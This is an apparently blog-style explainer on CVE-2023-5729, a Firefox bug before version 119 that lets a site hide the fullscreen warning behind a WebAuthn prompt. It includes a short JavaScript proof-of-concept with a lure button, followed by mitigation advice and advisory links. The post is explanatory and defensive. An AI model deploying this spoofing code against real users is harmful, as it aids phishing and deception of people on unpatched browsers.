CVE-2023-5729 is a security bug found in Firefox browsers before version 119. This vulnerability lets a malicious website hide browser notifications when entering fullscreen mode and, at the same time, show a WebAuthn (Web Authentication) prompt. By doing this, attackers could create a spoofing attack, tricking users into believing a fake prompt or website is legitimate. This post will walk you step-by-step through how this works, offer code snippets, sources, and explain how you can stay safe.
The Simple Version: What’s the Danger?
- When a site goes full screen, browsers like Firefox show a “You’re Fullscreen!” notification bar. This is meant to warn you in case a site is trying to trick you (phishing).
- When a site uses WebAuthn (to trigger hardware authentication, like your security key), a special browser prompt pops up.
- In vulnerable versions of Firefox (prior to 119), a site could trigger both events at the same time, causing the fullscreen notification to get hidden under the WebAuthn prompt.
- The attacker controls the entire fullscreen window, making it easy to disguise phishing attempts or fake browser UI.
1. Go Fullscreen On User Action
First, the attacker makes the browser go fullscreen, usually after a user clicks a button.
<button id="phishBtn">Click here for rewards</button>
<script>
document.getElementById('phishBtn').onclick = function() {
document.documentElement.requestFullscreen();
setTimeout(triggerWebAuthn, 300); // Slight delay to ensure fullscreen
};
</script>
2. Immediately Fire a WebAuthn Prompt
Once fullscreen, the site triggers a WebAuthn prompt which pops up above *any* fullscreen warnings (in vulnerable Firefox).
function triggerWebAuthn() {
let pubKey = {
challenge: new Uint8Array([1,2,3,4,5,6,7,8]),
rp: { name: "Evil Corp" },
user: {
id: new Uint8Array([1]),
name: "user@example.com",
displayName: "User Example"
},
pubKeyCredParams: [{ type: "public-key", alg: -7 }]
};
navigator.credentials.create({ publicKey: pubKey })
.catch(() => {});
}
Note: This code triggers the WebAuthn prompt but will hang unless you have a real authenticator.
3. What Does the User See?
- The fullscreen notification ("You are in fullscreen mode") is hidden *behind* the WebAuthn prompt.
- The attacker can draw fake browser UI: fake address bars, fake lock icons, etc., while you’re fullscreen and distracted by the prompt!
*This makes you much more likely to fall for phishing and spoofing.*
User clicks a button:
WebAuthn prompt appears:
Mozilla Security Advisory:
NIST NVD:
Bugzilla Report:
Mitigation — How Can You Stay Safe?
- Update Firefox: Upgrade to 119 or later. This closes the hole, ensuring fullscreen warnings won’t get shoved behind WebAuthn.
- Watch out for Fullscreen: If you notice the address bar or browser chrome disappear, be suspicious — especially if a prompt pops up right after.
- Don’t trust prompts in fullscreen: Never enter sensitive info or respond to prompts unless *you* initiated the action on a trusted site.
- Consider disabling WebAuthn on untrusted sites: Use browser extensions or consider disabling WebAuthn where possible for higher-risk scenarios (if you're an admin).
Conclusion
CVE-2023-5729 is a neat trick, taking advantage of user trust and browser UI overlap. With only a few lines of JavaScript, an attacker could hide browser warnings and try to phish even the most cautious user.
Upgrade your Firefox. Always check your browser address bar. Be suspicious of sudden fullscreen changes, especially when authentication is involved!
*Stay up to date and stay secure!*
Want to see this in action?
Try the demo code above in an *up-to-date* sandbox, and compare behavior in Firefox 118 and 119.
Sources:
- https://www.mozilla.org/en-US/security/advisories/mfsa2023-45/#CVE-2023-5729
- https://bugzilla.mozilla.org/show_bug.cgi?id=1855057
- https://nvd.nist.gov/vuln/detail/CVE-2023-5729
*Want more detailed proof-of-concepts or live demos? Comment or message!*
Timeline
Published on: 10/25/2023 18:17:44 UTC
Last modified on: 11/01/2023 19:53:53 UTC